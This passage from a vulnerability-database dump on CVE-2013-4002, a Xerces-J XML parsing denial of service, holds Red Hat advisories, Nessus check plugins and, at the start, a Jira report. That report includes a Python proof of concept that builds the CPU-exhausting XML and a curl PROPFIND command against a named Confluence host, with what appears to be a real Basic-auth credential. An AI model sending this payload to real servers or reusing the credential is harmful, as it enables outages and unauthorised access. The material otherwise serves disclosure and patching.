-\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default . It is possible to pass XML as data for\r\nPROPFIND request.\r\nFollowing python code will generate XML with long pseudo-attribute name that exploits CVE-2013-4002\r\nissue.\r\n{code}\r\n#!/usr/bin/env python\r\nimport os\r\noutdir = raw_input('specify output directory > ')\r\n### XML to exploit CVE-2013-4002\r\nxml = \"<?xml \" + \"\\xe7\\x9a\\x84\"*1000000 + \"='china' version = '1.0'?><a/>\"\r\nwith open(os.path.join(outdir,'cve2013-4002.xml'),'w') as out:\r\nout.write(xml)\r\ndef sizeof(num, suffix='B'):\r\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\r\n if abs(num) < 1024.0:\r\n return \"%3.1f%s%s\" % (num, unit, suffix)\r\n num /= 1024.0\r\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\r\nprint \"[+] File 'cve2013-4002.xml':\", sizeof(len(xml))\r\n{code}\r\nAccording to XML specification there are only three valid pseudo-attributes: version, encoding and\r\nstandalone. When we submit any random pseudo-attribute with long name, secure version of Xerces-J\r\nparser just ignores it. At the same time vulnerable version will try to parse it. This will require much CPU\r\nwork.\r\nIf you try to send this request with curl, you will see that there is no immediate answer from server. You\r\nwill get \u201cGateway Time-out\u201d answer from the server after 4 minutes.\r\n{code}\r\ncurl -X 'PROPFIND' -H 'Depth: 0' -H 'Content-Type: application/xml'\r\n-H 'Authorization: Basic Z3IzM2t3YXJpb3I6c2ExODEyODM5MSE=' --databinary\r\n'@/tmp/cve2013-4002.xml'\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default\r\n{code}\r\n{quote}", "modified": "2019-12-05T01:38:38", "published": "2015-06-19T06:43:36", "id": "ATLASSIAN:CONFSERVER-37991", "href": "https://jira.atlassian.com/browse/CONFSERVER-37991", "title": "Denial of Service attack through vulnerable Xerces-J library", "type": "atlassian", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:05", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. A list of these changes is available from the JBoss\nEnterprise Application Platform 6.3.2 Downloads page on the Customer\nPortal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat\nEnterprise Linux 6 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.\n", "modified": "2018-06-07T02:41:56", "published": "2014-11-06T05:00:00", "id": "RHSA-2014:1818", "href": "https://access.redhat.com/errata/RHSA-2014:1818", "type": "redhat", "title": "(RHSA-2014:1818) Moderate: Red Hat JBoss Enterprise Application Platform 6.3.2 update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:36", "bulletinFamily": "unix", "description": "Apache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2 packages\nprovide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. Applications using the\nXerces-J must be restarted for this update to take effect.\n", "modified": "2018-06-06T20:24:23", "published": "2014-09-29T04:00:00", "id": "RHSA-2014:1319", "href": "https://access.redhat.com/errata/RHSA-2014:1319", "type": "redhat", "title": "(RHSA-2014:1319) Moderate: xerces-j2 security update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:47:09", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. A list of these changes is available from the JBoss\nEnterprise Application Platform 6.3.2 Downloads page on the Customer\nPortal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat\nEnterprise Linux 5 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.\n", "modified": "2016-04-12T04:00:39", "published": "2014-11-06T05:00:00", "id": "RHSA-2014:1821", "href": "https://access.redhat.com/errata/RHSA-2014:1821", "type": "redhat", "title": "(RHSA-2014:1821) Moderate: Red Hat JBoss Enterprise Application Platform 6.3.2 update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:59", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. A list of these changes is available from the JBoss\nEnterprise Application Platform 6.3.2 Downloads page on the Customer\nPortal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat\nEnterprise Linux 7 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.", "modified": "2018-03-19T16:13:49", "published": "2014-11-06T21:38:07", "id": "RHSA-2014:1822", "href": "https://access.redhat.com/errata/RHSA-2014:1822", "type": "redhat", "title": "(RHSA-2014:1822) Moderate: Red Hat JBoss Enterprise Application Platform 6.3.2 update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T14:34:20", "bulletinFamily": "unix", "description": "Red Hat JBoss Data Grid is a distributed in-memory data grid, based on\nInfinispan.\n\nThis release of Red Hat JBoss Data Grid 6.4.1 serves as a replacement for\nRed Hat JBoss Data Grid 6.4.0. It includes various bug fixes and\nenhancements, which are detailed in the Red Hat JBoss Data Grid 6.4.1\nRelease Notes. The Release Notes are available at:\nhttps://access.redhat.com/documentation/en-US/Red_Hat_JBoss_Data_Grid/\n\nThis update also fixes the following security issues:\n\nIt was found that a prior countermeasure in Apache WSS4J for\nBleichenbacher's attack on XML Encryption (CVE-2011-2487) threw an\nexception that permitted an attacker to determine the failure of the\nattempted attack, thereby leaving WSS4J vulnerable to the attack.\nThe original flaw allowed a remote attacker to recover the entire plain\ntext form of a symmetric key. (CVE-2015-0226)\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nIt was found that the RESTEasy DocumentProvider did not set the\nexternal-parameter-entities and external-general-entities features\nappropriately, thus allowing external entity expansion. A remote attacker\nable to send XML requests to a RESTEasy endpoint could use this flaw to\nread files accessible to the user running the application server, and\npotentially perform other more advanced XML eXternal Entity (XXE) attacks.\n(CVE-2014-7839)\n\nIt was found that Apache WSS4J permitted bypass of the\nrequireSignedEncryptedDataElements configuration property via XML Signature\nwrapping attacks. A remote attacker could use this flaw to modify the\ncontents of a signed request. (CVE-2015-0227)\n\nIt was discovered that under specific conditions the conversation state\ninformation stored in a thread-local variable in JBoss Weld was not\nsanitized correctly when the conversation ended. This could lead to a race\ncondition that could potentially expose sensitive information from a\nprevious conversation to the current conversation. (CVE-2014-8122)\n\nRed Hat would like to thank Rune Steinseth of JProfessionals for reporting\nthe CVE-2014-8122 issue.\n\nAll users of Red Hat JBoss Data Grid 6.4.0 as provided from the Red Hat\nCustomer Portal are advised to upgrade to Red Hat JBoss Data Grid 6.4.1.", "modified": "2019-02-20T17:20:59", "published": "2015-04-01T18:38:06", "id": "RHSA-2015:0773", "href": "https://access.redhat.com/errata/RHSA-2015:0773", "type": "redhat", "title": "(RHSA-2015:0773) Important: Red Hat JBoss Data Grid 6.4.1 update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T14:34:42", "bulletinFamily": "unix", "description": "Red Hat JBoss BPM Suite is a business rules and processes management system\nfor the management, storage, creation, modification, and deployment of\nJBoss rules and BPMN2-compliant business processes.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss BPM\nSuite 6.0.3, and includes bug fixes and enhancements. It includes various\nbug fixes, which are listed in the README file included with the patch\nfiles.\n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section.\n\nCVE-2012-6153 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-6153 fix\n\nCVE-2013-4002 xerces-j2: Xerces-J2 OpenJDK: XML parsing Denial of Service\n(JAXP, 8017298)\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2014-0005 security: PicketBox/JBossSX: Unauthorized access to and\nmodification of application server configuration and state by application\n\nCVE-2014-0075 jbossweb: tomcat: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0096 jbossweb: Apache Tomcat: XXE vulnerability via user supplied\nXSLTs\n\nCVE-2014-0099 jbossweb: Apache Tomcat: Request smuggling via malicious\ncontent length header\n\nCVE-2014-0119 jbossweb: Apache Tomcat 6: XML parser hijack by malicious web\napplication\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter\n\nCVE-2014-3472 jboss-as-controller: JBoss AS Security: Invalid EJB caller\nrole check implementation\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2014-3558 hibernate-validator: Hibernate Validator: JSM bypass via\nReflectionHelper\n\nCVE-2014-3578 spring: Spring Framework: Directory traversal\n\nCVE-2014-3625 spring: Spring Framework: directory traversal flaw\n\nCVE-2014-3682 jbpm-designer: XXE in BPMN2 import\n\nCVE-2014-8114 UberFire: Information disclosure and RCE via insecure file\nupload/download servlets\n\nCVE-2014-8115 KIE Workbench: Insufficient authorization constraints\n\nRed Hat would like to thank James Roper of Typesafe for reporting the\nCVE-2014-0193 issue, CA Technologies for reporting the CVE-2014-3472 issue,\nAlexander Papadakis for reporting the CVE-2014-3530 issue, and David Jorm\nfor reporting the CVE-2014-8114 and CVE-2014-8115 issues. The CVE-2012-6153\nissue was discovered by Florian Weimer of Red Hat Product Security; the\nCVE-2014-0005 issue was discovered by Josef Cacek of the Red Hat JBoss EAP\nQuality Engineering team; the CVE-2014-0075, CVE-2014-3490, and\nCVE-2014-3682 issues were discovered by David Jorm of Red Hat Product\nSecurity.\n\nAll users of Red Hat JBoss BPM Suite 6.0.3 as provided from the Red Hat\nCustomer Portal are advised to apply this roll up patch.", "modified": "2019-02-20T17:19:22", "published": "2015-02-18T03:21:04", "id": "RHSA-2015:0234", "href": "https://access.redhat.com/errata/RHSA-2015:0234", "type": "redhat", "title": "(RHSA-2015:0234) Important: Red Hat JBoss BPM Suite 6.0.3 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:32:18", "bulletinFamily": "unix", "description": "Red Hat JBoss Data Virtualization is a lean data integration solution that\nprovides easy, real-time, and unified data access across disparate sources\nto multiple applications and users. JBoss Data Virtualization makes data\nspread across physically distinct systems\u2014such as multiple databases, XML\nfiles, and even Hadoop systems\u2014appear as a set of tables in a local\ndatabase.\n\nThe release of Red Hat JBoss Data Virtualization 6.1.0 serves as a\nreplacement for Red Hat JBoss Data Virtualization 6.0.0. It includes\nvarious bug fixes, which are listed in the README file included with the\npatch files.\n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section.\n\nCVE-2012-6153 Apache HttpComponents client / Apache CXF: SSL hostname\nverification bypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client / Apache CXF: SSL hostname\nverification bypass, incomplete CVE-2012-6153 fix\n\nCVE-2013-4002 Xerces-J2 OpenJDK: XML parsing Denial of Service (JAXP,\n8017298)\n\nCVE-2013-4517 Apache Santuario XML Security for Java: Java XML Signature\nDoS Attack\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2014-0059 JBossSX/PicketBox: World readable audit.log file\n\nCVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs\n\nCVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content\nlength header\n\nCVE-2014-0119 Tomcat/JBossWeb: XML parser hijack by malicious web\napplication\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-3481 JBoss AS JAX-RS: Information disclosure via XML eXternal\nEntity (XXE)\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2014-3623 Apache WSS4J / Apache CXF: Improper security semantics\nenforcement of SAML SubjectConfirmation methods\n\nCVE-2014-7839 RESTeasy: External entities expanded by DocumentProvider\n\nCVE-2014-8122 JBoss Weld: Limited information disclosure via stale thread\nstate\n\nRed Hat would like to thank James Roper of Typesafe for reporting\nCVE-2014-0193, Alexander Papadakis for reporting CVE-2014-3530, and Rune\nSteinseth of JProfessionals for reporting CVE-2014-8122. The CVE-2012-6153\nissue was discovered by Florian Weimer of Red Hat Product Security, the\nCVE-2014-0075 and CVE-2014-3490 issues were discovered by David Jorm of Red\nHat Product Security, and the CVE-2014-3481 issue was discovered by the Red\nHat JBoss Enterprise Application Platform QE team.\n\nAll users of Red Hat JBoss Data Virtualization 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this roll up patch.", "modified": "2019-02-20T17:19:46", "published": "2015-03-11T20:43:55", "id": "RHSA-2015:0675", "href": "https://access.redhat.com/errata/RHSA-2015:0675", "type": "redhat", "title": "(RHSA-2015:0675) Important: Red Hat JBoss Data Virtualization 6.1.0 update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:21", "bulletinFamily": "unix", "description": "Red Hat JBoss BRMS is a business rules management system for the\nmanagement, storage, creation, modification, and deployment of JBoss\nRules.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss BRMS\n6.0.3, and includes bug fixes and enhancements. It includes various bug\nfixes, which are listed in the README file included with the patch files.\n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section.\n\nCVE-2012-6153 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-6153 fix\n\nCVE-2013-4002 xerces-j2: Xerces-J2 OpenJDK: XML parsing Denial of Service\n(JAXP, 8017298)\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2014-0005 security: PicketBox/JBossSX: Unauthorized access to and\nmodification of application server configuration and state by application\n\nCVE-2014-0075 jbossweb: tomcat: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0096 jbossweb: Apache Tomcat: XXE vulnerability via user supplied\nXSLTs\n\nCVE-2014-0099 jbossweb: Apache Tomcat: Request smuggling via malicious\ncontent length header\n\nCVE-2014-0119 jbossweb: Apache Tomcat 6: XML parser hijack by malicious web\napplication\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter\n\nCVE-2014-3472 jboss-as-controller: JBoss AS Security: Invalid EJB caller\nrole check implementation\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2014-3558 hibernate-validator: Hibernate Validator: JSM bypass via\nReflectionHelper\n\nCVE-2014-3578 spring: Spring Framework: Directory traversal\n\nCVE-2014-3625 spring: Spring Framework: directory traversal flaw\n\nCVE-2014-3682 jbpm-designer: XXE in BPMN2 import\n\nCVE-2014-8114 UberFire: Information disclosure and RCE via insecure file\nupload/download servlets\n\nCVE-2014-8115 KIE Workbench: Insufficient authorization constraints\n\nRed Hat would like to thank James Roper of Typesafe for reporting the\nCVE-2014-0193 issue; CA Technologies for reporting the CVE-2014-3472 issue;\nAlexander Papadakis for reporting the CVE-2014-3530 issue; and David Jorm\nfor reporting the CVE-2014-8114 and CVE-2014-8115 issues. The CVE-2012-6153\nissue was discovered by Florian Weimer of Red Hat Product Security; the\nCVE-2014-0005 issue was discovered by Josef Cacek of the Red Hat JBoss EAP\nQuality Engineering team; and the CVE-2014-0075, CVE-2014-3490, and\nCVE-2014-3682 issues were discovered by David Jorm of Red Hat Product\nSecurity.\n\nAll users of Red Hat JBoss BRMS 6.0.3 as provided from the Red Hat Customer\nPortal are advised to apply this roll up patch.", "modified": "2019-02-20T17:19:25", "published": "2015-02-18T03:22:40", "id": "RHSA-2015:0235", "href": "https://access.redhat.com/errata/RHSA-2015:0235", "type": "redhat", "title": "(RHSA-2015:0235) Important: Red Hat JBoss BRMS 6.0.3 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:01", "bulletinFamily": "unix", "description": "Red Hat JBoss Data Virtualization is a lean data integration solution that\nprovides easy, real-time, and unified data access across disparate sources\nto multiple applications and users. JBoss Data Virtualization makes data\nspread across physically distinct systems-such as multiple databases, XML\nfiles, and even Hadoop systems-appear as a set of tables in a local\ndatabase.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss Data\nVirtualization 6.0.0. It includes various bug fixes, which are listed in\nthe README file included with the patch files.\n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section.\n\nCVE-2012-6153 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-6153 fix\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2013-4002 Xerces-J2 OpenJDK: XML parsing Denial of Service (JAXP,\n8017298)\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content\nlength header\n\nCVE-2014-3481 JBoss AS JAX-RS: Information disclosure via XML eXternal\nEntity (XXE)\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs\n\nCVE-2014-0119 Tomcat/JBossWeb: XML parser hijack by malicious web\napplication\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter \n\nRed Hat would like to thank James Roper of Typesafe for reporting\nCVE-2014-0193, and Alexander Papadakis for reporting CVE-2014-3530.\nThe CVE-2012-6153 issue was discovered by Florian Weimer of Red Hat Product\nSecurity, the CVE-2014-0075 and CVE-2014-3490 issues were discovered by\nDavid Jorm of Red Hat Product Security, and the CVE-2014-3481 issue was\ndiscovered by the Red Hat JBoss Enterprise Application Platform QE team.\n\nAll users of Red Hat JBoss Data Virtualization 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this roll up patch.", "modified": "2019-02-20T17:21:42", "published": "2015-03-31T20:57:22", "id": "RHSA-2015:0765", "href": "https://access.redhat.com/errata/RHSA-2015:0765", "type": "redhat", "title": "(RHSA-2015:0765) Important: Red Hat JBoss Data Virtualization 6.0.0 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:35:19", "bulletinFamily": "unix", "description": "Red Hat JBoss Fuse Service Works is the next-generation ESB and business\nprocess automation infrastructure.\n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss Fuse\nService Works 6.0.0. It includes various bug fixes, which are listed in the\nREADME file included with the patch files.\n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section.\n\nCVE-2012-6153 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-5783 fix\n\nCVE-2014-3577 Apache HttpComponents client: SSL hostname verification\nbypass, incomplete CVE-2012-6153 fix\n\nCVE-2014-3625 spring: Spring Framework: directory traversal flaw\n\nCVE-2014-3578 spring: Spring Framework: Directory traversal\n\nCVE-2014-3558 hibernate-validator: Hibernate Validator: JSM bypass via\nReflectionHelper\n\nCVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage\n\nCVE-2014-3490 RESTEasy: XXE via parameter entities\n\nCVE-2014-3481 jboss-as-jaxrs: JBoss AS JAX-RS: Information disclosure via\nXML eXternal Entity (XXE)\n\nCVE-2014-3472 jboss-as-controller: JBoss AS Security: Invalid EJB caller\nrole check implementation\n\nCVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0193 netty: DoS via memory exhaustion during data aggregation\n\nCVE-2014-0119 jbossweb: Apache Tomcat 6: XML parser hijack by malicious web\napplication\n\nCVE-2014-0099 jbossweb: Apache Tomcat: Request smuggling via malicious\ncontent length header\n\nCVE-2014-0096 jbossweb: Apache Tomcat: XXE vulnerability via user supplied\nXSLTs\n\nCVE-2014-0075 jbossweb: tomcat: Limited DoS in chunked transfer encoding\ninput filter\n\nCVE-2014-0005 security: PicketBox/JBossSX: Unauthorized access to and\nmodification of application server configuration and state by application\n\nCVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of\nuser-supplied content in outputText tags and EL expressions\n\nCVE-2013-4002 xerces-j2: Xerces-J2 OpenJDK: XML parsing Denial of Service\n(JAXP, 8017298)\n\nRed Hat would like to thank James Roper of Typesafe for reporting the\nCVE-2014-0193 issue; CA Technologies for reporting the CVE-2014-3472\nissue; and Alexander Papadakis for reporting the CVE-2014-3530 issue. The\nCVE-2012-6153 issue was discovered by Florian Weimer of Red Hat Product\nSecurity; the CVE-2014-0005 issue was discovered by Josef Cacek of the Red\nHat JBoss EAP Quality Engineering team; the CVE-2014-3481 issue was\ndiscovered by the Red Hat JBoss Enterprise Application Platform QE team;\nand the CVE-2014-0075 and CVE-2014-3490 issues were discovered by David\nJorm of Red Hat Product Security.\n\nAll users of Red Hat JBoss Fuse Service Works 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this roll up patch.", "modified": "2019-02-20T17:23:57", "published": "2015-03-25T00:57:38", "id": "RHSA-2015:0720", "href": "https://access.redhat.com/errata/RHSA-2015:0720", "type": "redhat", "title": "(RHSA-2015:0720) Important: Red Hat JBoss Fuse Service Works 6.0.0 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-12-13T08:05:54", "bulletinFamily": "scanner", "description": "A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU (CVE-2013-4002).", "modified": "2019-12-02T00:00:00", "id": "MANDRIVA_MDVSA-2014-193.NASL", "href": "https://www.tenable.com/plugins/nessus/78019", "published": "2014-10-02T00:00:00", "title": "Mandriva Linux Security Advisory : xerces-j2 (MDVSA-2014:193)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:193. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78019);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n script_xref(name:\"MDVSA\", value:\"2014:193\");\n\n script_name(english:\"Mandriva Linux Security Advisory : xerces-j2 (MDVSA-2014:193)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU (CVE-2013-4002).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1319\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected xerces-j2, xerces-j2-demo and / or\nxerces-j2-javadoc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xerces-j2-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xerces-j2-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"xerces-j2-2.11.0-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"xerces-j2-demo-2.11.0-7.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"xerces-j2-javadoc-2.11.0-7.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T07:03:51", "bulletinFamily": "scanner", "description": "Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2014-10617.NASL", "href": "https://www.tenable.com/plugins/nessus/77791", "published": "2014-09-23T00:00:00", "title": "Fedora 21 : xerces-j2-2.11.0-22.fc21 (2014-10617)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10617.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n 